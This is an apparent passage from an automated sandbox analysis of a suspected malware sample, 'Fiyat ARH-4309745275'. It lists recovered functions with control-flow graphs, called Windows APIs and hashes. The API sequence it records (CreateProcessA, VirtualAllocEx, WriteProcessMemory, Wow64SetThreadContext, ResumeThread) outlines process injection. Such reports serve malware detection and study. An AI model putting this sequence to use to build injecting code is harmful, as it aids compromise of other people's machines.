                  • Not Executed
                  control_flow_graph 58 75d70e6-75d7185 60 75d71be-75d71de 58->60 61 75d7187-75d7191 58->61 66 75d7217-75d7246 60->66 67 75d71e0-75d71ea 60->67 61->60 62 75d7193-75d7195 61->62 64 75d71b8-75d71bb 62->64 65 75d7197-75d71a1 62->65 64->60 68 75d71a5-75d71b4 65->68 69 75d71a3 65->69 75 75d727f-75d7339 CreateProcessA 66->75 76 75d7248-75d7252 66->76 67->66 71 75d71ec-75d71ee 67->71 68->68 70 75d71b6 68->70 69->68 70->64 72 75d7211-75d7214 71->72 73 75d71f0-75d71fa 71->73 72->66 77 75d71fc 73->77 78 75d71fe-75d720d 73->78 89 75d733b-75d7341 75->89 90 75d7342-75d73c8 75->90 76->75 79 75d7254-75d7256 76->79 77->78 78->78 80 75d720f 78->80 81 75d7279-75d727c 79->81 82 75d7258-75d7262 79->82 80->72 81->75 84 75d7264 82->84 85 75d7266-75d7275 82->85 84->85 85->85 86 75d7277 85->86 86->81 89->90 100 75d73d8-75d73dc 90->100 101 75d73ca-75d73ce 90->101 103 75d73ec-75d73f0 100->103 104 75d73de-75d73e2 100->104 101->100 102 75d73d0 101->102 102->100 106 75d7400-75d7404 103->106 107 75d73f2-75d73f6 103->107 104->103 105 75d73e4 104->105 105->103 109 75d7416-75d741d 106->109 110 75d7406-75d740c 106->110 107->106 108 75d73f8 107->108 108->106 111 75d741f-75d742e 109->111 112 75d7434 109->112 110->109 111->112 114 75d7435 112->114 114->114
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 075D7326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 690e6cf317b04116c7d510e86551fb7ef14c6ff2662530cb2387e9d797ce72a6
                  • Instruction ID: 0f1a2e24377601c44bb76abeceb16ee58771490d3fad0bae82acfd92a2e3e593
                  • Opcode Fuzzy Hash: 690e6cf317b04116c7d510e86551fb7ef14c6ff2662530cb2387e9d797ce72a6
                  • Instruction Fuzzy Hash: 2B912DB1D00259DFDB24DFA8C8417DEBBB2BF48314F14856AE818A7240DB759D85CF91
                  Function 075D70F0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 115 75d70f0-75d7185 117 75d71be-75d71de 115->117 118 75d7187-75d7191 115->118 123 75d7217-75d7246 117->123 124 75d71e0-75d71ea 117->124 118->117 119 75d7193-75d7195 118->119 121 75d71b8-75d71bb 119->121 122 75d7197-75d71a1 119->122 121->117 125 75d71a5-75d71b4 122->125 126 75d71a3 122->126 132 75d727f-75d7339 CreateProcessA 123->132 133 75d7248-75d7252 123->133 124->123 128 75d71ec-75d71ee 124->128 125->125 127 75d71b6 125->127 126->125 127->121 129 75d7211-75d7214 128->129 130 75d71f0-75d71fa 128->130 129->123 134 75d71fc 130->134 135 75d71fe-75d720d 130->135 146 75d733b-75d7341 132->146 147 75d7342-75d73c8 132->147 133->132 136 75d7254-75d7256 133->136 134->135 135->135 137 75d720f 135->137 138 75d7279-75d727c 136->138 139 75d7258-75d7262 136->139 137->129 138->132 141 75d7264 139->141 142 75d7266-75d7275 139->142 141->142 142->142 143 75d7277 142->143 143->138 146->147 157 75d73d8-75d73dc 147->157 158 75d73ca-75d73ce 147->158 160 75d73ec-75d73f0 157->160 161 75d73de-75d73e2 157->161 158->157 159 75d73d0 158->159 159->157 163 75d7400-75d7404 160->163 164 75d73f2-75d73f6 160->164 161->160 162 75d73e4 161->162 162->160 166 75d7416-75d741d 163->166 167 75d7406-75d740c 163->167 164->163 165 75d73f8 164->165 165->163 168 75d741f-75d742e 166->168 169 75d7434 166->169 167->166 168->169 171 75d7435 169->171 171->171
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 075D7326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: dcce8800fecd107a9f11a15ace6529afb76f4c5551e368e89a538066f2096d88
                  • Instruction ID: 8a7c00c3455c4a88dbccd954fc0497a20350829381b2e80968c870752265a44a
                  • Opcode Fuzzy Hash: dcce8800fecd107a9f11a15ace6529afb76f4c5551e368e89a538066f2096d88
                  • Instruction Fuzzy Hash: 3C912DB1D00259DFDB24DFA8C8417DEBBB2BF48314F14856AE818A7240DB759D85CF91
                  Function 011DACE8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 172 11dace8-11dacf7 173 11dacf9-11dad06 call 11da00c 172->173 174 11dad23-11dad27 172->174 181 11dad1c 173->181 182 11dad08 173->182 176 11dad29-11dad33 174->176 177 11dad3b-11dad7c 174->177 176->177 183 11dad7e-11dad86 177->183 184 11dad89-11dad97 177->184 181->174 229 11dad0e call 11daf70 182->229 230 11dad0e call 11daf80 182->230 183->184 185 11dad99-11dad9e 184->185 186 11dadbb-11dadbd 184->186 188 11dada9 185->188 189 11dada0-11dada7 call 11da018 185->189 191 11dadc0-11dadc7 186->191 187 11dad14-11dad16 187->181 190 11dae58-11daf18 187->190 193 11dadab-11dadb9 188->193 189->193 222 11daf1a-11daf1d 190->222 223 11daf20-11daf4b GetModuleHandleW 190->223 194 11dadc9-11dadd1 191->194 195 11dadd4-11daddb 191->195 193->191 194->195 198 11daddd-11dade5 195->198 199 11dade8-11dadf1 call 11da028 195->199 198->199 203 11dadfe-11dae03 199->203 204 11dadf3-11dadfb 199->204 205 11dae05-11dae0c 203->205 206 11dae21-11dae25 203->206 204->203 205->206 208 11dae0e-11dae1e call 11da038 call 11da048 205->208 227 11dae28 call 11db270 206->227 228 11dae28 call 11db280 206->228 208->206 211 11dae2b-11dae2e 213 11dae51-11dae57 211->213 214 11dae30-11dae4e 211->214 214->213 222->223 224 11daf4d-11daf53 223->224 225 11daf54-11daf68 223->225 224->225 227->211 228->211 229->187 230->187
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000), ref: 011DAF3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 5909f34ddb60fc674e62116755d22f1b932d1ab6af39ef816b4d637ef762e883
                  • Instruction ID: b00b8d4b81adbadb29b805047f7b817d19cd62bff92b7334a4f2cba9ab8afcb9
                  • Opcode Fuzzy Hash: 5909f34ddb60fc674e62116755d22f1b932d1ab6af39ef816b4d637ef762e883
                  • Instruction Fuzzy Hash: 18714770A00B058FEB29DF29E44079ABBF1FF88214F008A2DD48AD7B50D775E949CB91
                  Function 011D58ED Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 231 11d58ed-11d59b9 CreateActCtxA 233 11d59bb-11d59c1 231->233 234 11d59c2-11d5a1c 231->234 233->234 241 11d5a1e-11d5a21 234->241 242 11d5a2b-11d5a2f 234->242 241->242 243 11d5a31-11d5a3d 242->243 244 11d5a40 242->244 243->244 246 11d5a41 244->246 246->246
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 011D59A9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: 62d94940522ab5a09a31ceb7350ea7dd56d2aa588f3022e9f7381d5cb7ba2816
                  • Instruction ID: 0c6e0c9e601d7c74b5b947f282c73396757dd1285ac3f86fd4a060cc6f3d3588
                  • Opcode Fuzzy Hash: 62d94940522ab5a09a31ceb7350ea7dd56d2aa588f3022e9f7381d5cb7ba2816
                  • Instruction Fuzzy Hash: 9341C5B0C10719CFDB28CFA9C884BDEBBB6BF49304F24816AD809AB251D7755946CF51
                  Function 011D44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 247 11d44b0-11d59b9 CreateActCtxA 250 11d59bb-11d59c1 247->250 251 11d59c2-11d5a1c 247->251 250->251 258 11d5a1e-11d5a21 251->258 259 11d5a2b-11d5a2f 251->259 258->259 260 11d5a31-11d5a3d 259->260 261 11d5a40 259->261 260->261 263 11d5a41 261->263 263->263
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 011D59A9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: b3a91cef063759a04ab3adecac09b1ca30cdfac98cfea307b6b95ae987c61619
                  • Instruction ID: 3ce8f0284b1b6c9da985bf69223dee78b1918e138e1395c28db12abb7de5354f
                  • Opcode Fuzzy Hash: b3a91cef063759a04ab3adecac09b1ca30cdfac98cfea307b6b95ae987c61619
                  • Instruction Fuzzy Hash: 3841C570C10719CBDB28DFA9C844BDEBBB6BF49304F20806AD408AB251D7755945CF91
                  Function 075D6E60 Relevance: 1.6, APIs: 1, Instructions: 77injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 264 75d6e60-75d6e64 265 75d6e4b-75d6e51 264->265 266 75d6e66-75d6eb6 264->266 268 75d6eb8-75d6ec4 266->268 269 75d6ec6-75d6f05 WriteProcessMemory 266->269 268->269 271 75d6f0e-75d6f3e 269->271 272 75d6f07-75d6f0d 269->272 272->271
                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 075D6EF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 20bc2a98698bd677e7bc6e0297782b4ac280eab204a7b34c5697fb821432bac4
                  • Instruction ID: 04e4a11cf45bea62c194b516af0782e494a575fd222355f4a7cd68500168cb29
                  • Opcode Fuzzy Hash: 20bc2a98698bd677e7bc6e0297782b4ac280eab204a7b34c5697fb821432bac4
                  • Instruction Fuzzy Hash: 3F3159B69003099FDB10CFA9D981BDEBBF1FF48310F10882AE519A7240C7799955CBA4
                  Function 075D6E68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 276 75d6e68-75d6eb6 278 75d6eb8-75d6ec4 276->278 279 75d6ec6-75d6f05 WriteProcessMemory 276->279 278->279 281 75d6f0e-75d6f3e 279->281 282 75d6f07-75d6f0d 279->282 282->281
                  APIs
                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 075D6EF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 23fd1c8e00926099ac721ac69ac795d472e3b40f56f9a8ee4ca0b9ce43247a77
                  • Instruction ID: a09ffa92e39b251e24c242bc572ea368fedf529910d4c34fb9d7e6031b73fce5
                  • Opcode Fuzzy Hash: 23fd1c8e00926099ac721ac69ac795d472e3b40f56f9a8ee4ca0b9ce43247a77
                  • Instruction Fuzzy Hash: 2E2127B5900349DFDB10CFAAC885BDEBBF5FF48310F10842AE919A7240D7799955CBA4
                  Function 075D6CC8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 286 75d6cc8-75d6d1b 288 75d6d1d-75d6d29 286->288 289 75d6d2b-75d6d5b Wow64SetThreadContext 286->289 288->289 291 75d6d5d-75d6d63 289->291 292 75d6d64-75d6d94 289->292 291->292
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075D6D4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 0581ec7ac0ddb889ee32b2d81e1121f34b0fd8dbd9380a9a7fc681b510d3cbf1
                  • Instruction ID: b86dfa8f36b33fa7e287eb77abe6110f79540ac3e811472f26fcdb741a28932c
                  • Opcode Fuzzy Hash: 0581ec7ac0ddb889ee32b2d81e1121f34b0fd8dbd9380a9a7fc681b510d3cbf1
                  • Instruction Fuzzy Hash: CC2149B69003098FDB50DFAAC4857EEBBF4FF48324F14842AD519A7240D7789A45CFA4
                  Function 075D6F52 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 296 75d6f52-75d6fe5 ReadProcessMemory 299 75d6fee-75d701e 296->299 300 75d6fe7-75d6fed 296->300 300->299
                  APIs
                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 075D6FD8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: bd42840f8f06f9ef7d669b01692ed4869d3509939f87b84ab3100303e041adb8
                  • Instruction ID: b9186b57e00115caedb12cc117c91fe2b704d19e9c7b272081095b5f170e366f
                  • Opcode Fuzzy Hash: bd42840f8f06f9ef7d669b01692ed4869d3509939f87b84ab3100303e041adb8
                  • Instruction Fuzzy Hash: 472128B68003599FDB10CFA9C881BEEBBF5FF48310F50842AE918A7240D7799955CFA4
                  Function 075D6F58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 75d6f58-75d6fe5 ReadProcessMemory 317 75d6fee-75d701e 314->317 318 75d6fe7-75d6fed 314->318 318->317
                  APIs
                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 075D6FD8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: 102b0723ce9bcbac7787aa7615c07579c32fd9ed9f61d92c5890644f1f1f03d9
                  • Instruction ID: ff9f5bd97bcdbf609963b59c814f6d00b37b155105c0f7eba3c0163254acb8ec
                  • Opcode Fuzzy Hash: 102b0723ce9bcbac7787aa7615c07579c32fd9ed9f61d92c5890644f1f1f03d9
                  • Instruction Fuzzy Hash: 1A2128B18003599FDB10CFAAC840BEEBBF5FF48310F50842AE918A7240D7789941CBA5
                  Function 075D6CD0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 304 75d6cd0-75d6d1b 306 75d6d1d-75d6d29 304->306 307 75d6d2b-75d6d5b Wow64SetThreadContext 304->307 306->307 309 75d6d5d-75d6d63 307->309 310 75d6d64-75d6d94 307->310 309->310
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 075D6D4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 9cdf4b58b306854e85511fa84b48324dfe9cbcd915b54285a9633e521ed5e93e
                  • Instruction ID: 567ab90a707ed2d1752acd0264806ad0cec1a828ee2c8e0df3e7389795992993
                  • Opcode Fuzzy Hash: 9cdf4b58b306854e85511fa84b48324dfe9cbcd915b54285a9633e521ed5e93e
                  • Instruction Fuzzy Hash: 382147B19003098FDB60DFAAC4857EEBBF4FF48324F14842AD519A7240D7B89985CFA4
                  Function 011DD5D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 322 11dd5d0-11dd664 DuplicateHandle 323 11dd66d-11dd68a 322->323 324 11dd666-11dd66c 322->324 324->323
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD657
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 2486354f187c7ab3e679d2b810670b1faa3d6c4bab402bbfca8d8d0c5f35c727
                  • Instruction ID: 645e0337579667118d5c9b93e88b4992ab187a7c70b9fa646e6d366dbba2aae9
                  • Opcode Fuzzy Hash: 2486354f187c7ab3e679d2b810670b1faa3d6c4bab402bbfca8d8d0c5f35c727
                  • Instruction Fuzzy Hash: 7E21D5B59002489FDB10CFAAD984ADEFBF4FB48310F14845AE918A7350D374A954CFA5
                  Function 011DD5C9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD657
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 3b10277fb189963c7011ca3b9434a6afde8349e1a4c8a53a779eb79f3ff6db45
                  • Instruction ID: 800f6e153a74a54d49f0b6189316edff74dcce844f456e64b2c13d77d2e7cdfc
                  • Opcode Fuzzy Hash: 3b10277fb189963c7011ca3b9434a6afde8349e1a4c8a53a779eb79f3ff6db45
                  • Instruction Fuzzy Hash: 6321E4B59002089FDB10CFAAD584ADEBBF5FB48314F14846AE918A3350C374A944CF65
                  Function 075D6DA0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 075D6E16
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 92c031f8db5cba00597fabe472a88b5e46788b8df586e77eb991094279dec36d
                  • Instruction ID: 393821b1dcceedcb97d36b2c6ec0da664c78a5b7bed233074bceaa756a806c67
                  • Opcode Fuzzy Hash: 92c031f8db5cba00597fabe472a88b5e46788b8df586e77eb991094279dec36d
                  • Instruction Fuzzy Hash: 72116AB68002099FDB10DFA9C8457DFBBF5FF48310F14881AE515A7250C7759941CFA0
                  Function 011DA070 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,011DAFB9,00000800,00000000,00000000), ref: 011DB1CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 67c767fb5e0d5688c6780b53242b3f962bbafbca203e495010f2ba141529eb10
                  • Instruction ID: 5c084326863a60d404874719decadcff2a58182ca4317439ad8a50251d2b3dc9
                  • Opcode Fuzzy Hash: 67c767fb5e0d5688c6780b53242b3f962bbafbca203e495010f2ba141529eb10
                  • Instruction Fuzzy Hash: 901114B69043099FDB14CFAAD844BDEFBF4EB89310F11842EE519A7210C375A945CFA9
                  Function 011DB158 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,011DAFB9,00000800,00000000,00000000), ref: 011DB1CA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 90d80ad41652a361bfe6d81eaf220cf0d17deeca1d7e56e0d409a344988f1920
                  • Instruction ID: 170c0c7957db93d6338c3c50c612bbf59bbb246ae362425086dcee2041a3da74
                  • Opcode Fuzzy Hash: 90d80ad41652a361bfe6d81eaf220cf0d17deeca1d7e56e0d409a344988f1920
                  • Instruction Fuzzy Hash: BE1114B68003098FDB14CFAAD845BDEFBF4EB89310F11842AE519A7200C375A545CFA9
                  Function 075D6DA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 075D6E16
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: b39180ee9141edf61fb1f82e97b29682e52b11fd2f7b4508d9ad8b461a1b8041
                  • Instruction ID: deaf836f2890d24d927c83c4bd0c1420063349f558f56ab51163046e1fb8e259
                  • Opcode Fuzzy Hash: b39180ee9141edf61fb1f82e97b29682e52b11fd2f7b4508d9ad8b461a1b8041
                  • Instruction Fuzzy Hash: CE1126728002499FDB20DFAAC844BDFBBF5EF48320F14881AE515A7250C7769950CFA4
                  Function 075D67E0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 425de85e7c7cbb899cfa9d09772f58e28fee36a2fadc884fc15e94f7038954f4
                  • Instruction ID: acc3fd9c5f3c290f6320df5e1f90b21d7f01fc414d818043df39f229bb54fb7c
                  • Opcode Fuzzy Hash: 425de85e7c7cbb899cfa9d09772f58e28fee36a2fadc884fc15e94f7038954f4
                  • Instruction Fuzzy Hash: 091158B69003498FDB20DFAAC4457DEFBF5EF48320F24882AD519A7240C779A945CFA4
                  Function 075D67E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 9ec27bf4c3643f76d505870783f5dc20e4cf6f04a5f1b26caf617b7d0be40588
                  • Instruction ID: 5388b5014bfcc1b2205592c3a0b5651730d554dc4cece6781c8dadcdf8cbc95d
                  • Opcode Fuzzy Hash: 9ec27bf4c3643f76d505870783f5dc20e4cf6f04a5f1b26caf617b7d0be40588
                  • Instruction Fuzzy Hash: CA1128B19003488BDB20DFAAC4457DFFBF5EB88324F14842AD519A7240C7756945CBA4
                  Function 011DAED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000), ref: 011DAF3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1326462522.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_11d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 40591790b2ebd036a535f231ab37bb6ca762834d5c3333d9ada0d699fed71c78
                  • Instruction ID: b891239b82537057037c37648fd7a711d0fc69035bad821cfc2484ba28a948e2
                  • Opcode Fuzzy Hash: 40591790b2ebd036a535f231ab37bb6ca762834d5c3333d9ada0d699fed71c78
                  • Instruction Fuzzy Hash: 181110B6C002498FDB14CF9AD444BDEFBF4EF88224F1084AAD528A7240C379A545CFA5
                  Function 075D963C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 075D9E0D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: fe732e5afa4ff327a1aca2a3157108432d1bec1ed95c9d5408a2ce44e5c8af40
                  • Instruction ID: 050f954b9307507915c52af4563cea301417fca6848de6d0d691b642c1b4ba38
                  • Opcode Fuzzy Hash: fe732e5afa4ff327a1aca2a3157108432d1bec1ed95c9d5408a2ce44e5c8af40
                  • Instruction Fuzzy Hash: 8011F5B58043499FDB20DF9AC445BDEFBF8FB48310F10845AE558A7201C375A944CFA5
                  Function 075D9DA8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 075D9E0D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1336020498.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_75d0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: ad07d66c927f15095be4ce93316d2f3bcfb51d668e8beee3ad18b69525b8e35e
                  • Instruction ID: bb9546c1aead9c8b8be3827bda916b338837bd0fabae5fc9987a3a40af84a7f4
                  • Opcode Fuzzy Hash: ad07d66c927f15095be4ce93316d2f3bcfb51d668e8beee3ad18b69525b8e35e
                  • Instruction Fuzzy Hash: 041106B68002098FDB10CF99D485BDEFBF4FB48320F10881AD518A7200C375AA44CFA5
                  Function 0117D4C4 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
